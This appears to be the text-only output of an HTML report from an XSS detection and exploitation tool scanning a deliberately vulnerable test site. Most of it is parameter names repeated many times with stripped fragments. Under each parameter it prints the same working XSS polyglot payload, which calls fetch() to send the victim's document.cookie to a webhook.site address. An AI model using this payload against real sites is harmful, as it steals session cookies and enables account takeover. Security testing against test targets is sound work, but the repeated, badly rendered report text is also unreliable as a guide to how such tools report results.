Advanced XSS Vulnerability Detection & Exploitation Tool
Target: http://testphp.vulnweb.com/search.php?searchFor=test
Scan Date: 2025-09-06T11:14:07.174368
Total Vulnerabilities
Reflected XSS
Stored XSS
DOM XSS
Blind XSS
link
link
preference
preference
id
id
theme
theme
searchFor
searchFor
value
value
settings
settings
category
category
prev
prev
format
format
page
page
query
query
title
title
filter
filter
profile
profile
callback
callback
test
test
config
config
redirect
redirect
do
do
func
func
search
search
locale
locale
logout
logout
user
user
offset
offset
function
function
action
action
q
q
limit
limit
style
style
cmd
cmd
register
register
text
text
type
type
description
description
email
email
content
content
sort
sort
key
key
debug
debug
admin
admin
return
return
comment
comment
message
message
url
url
next
next
username
username
input
input
subject
subject
token
token
body
body
back
back
login
login
pref
pref
output
output
command
command
password
password
name
name
lang
lang
data
data
option
option
searchFor
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
link
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
link
">
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
preference
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
preference
">
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
id
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
id
">
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
theme
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
theme
">
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
searchFor
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
searchFor
">
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
value
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
value
">
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
settings
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
settings
">
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
category
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
category
">
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
prev
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
prev
">
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
format
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
format
">
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
page
">
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
query
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
query
">
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
title
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
title
">
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
filter
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
filter
">
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
profile
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
profile
">
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
callback
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
callback
">
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
test
">
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
config
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
config
">
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
redirect
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
redirect
">
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
do
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
do
">
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
func
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
func
">
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
search
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
search
">
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
locale
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
locale
">
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
logout
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
logout
">
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
user
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
user
">
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
offset
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
offset
">
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
function
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
function
">
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
action
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
action
">
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
q
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
q
">
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
limit
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
limit
">
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
style
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
style
">
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
cmd
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
cmd
">
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
register
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
register
">
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
text
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
text
">
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
type
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
type
">
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
description
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
description
">
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
email
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
email
">
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
content
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
content
">
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
sort
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
sort
">
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
key
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
key
">
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
debug
">
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
admin
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
admin
">
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
return
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
return
">
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
comment
">
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
message
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
message
">
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
url
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
url
">
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
next
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
next
">
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
username
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
username
">
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
input
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
input
">
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
subject
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
subject
">
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
token
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
token
">
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
body
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
body
">
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
back
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
back
">
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
login
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
login
">
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
pref
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
pref
">
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
output
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
output
">
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
command
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
command
">
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
password
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
password
">
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
name
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
name
">
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
lang
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
lang
">
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
data
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
data
">
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
option
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=fetch("https://webhook.site/unique-id?data="+document.cookie) )//%0D%0A%0d%0a//\x3csVg/
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
option
">
linkpreferenceidthemesearchForvaluesettingscategoryprevformatpagequerytitlefilterprofilecallbacktestconfigredirectdosearchFor (text)goButton (submit)Detected WAFs: generic